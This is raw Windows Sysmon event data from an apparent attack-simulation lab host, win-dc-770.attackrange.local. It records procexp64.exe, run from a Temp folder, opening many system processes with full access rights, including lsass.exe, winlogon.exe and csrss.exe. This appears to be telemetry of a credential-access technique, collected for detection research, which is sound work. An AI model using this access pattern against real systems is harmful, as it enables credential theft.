15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.533{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:02.518{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 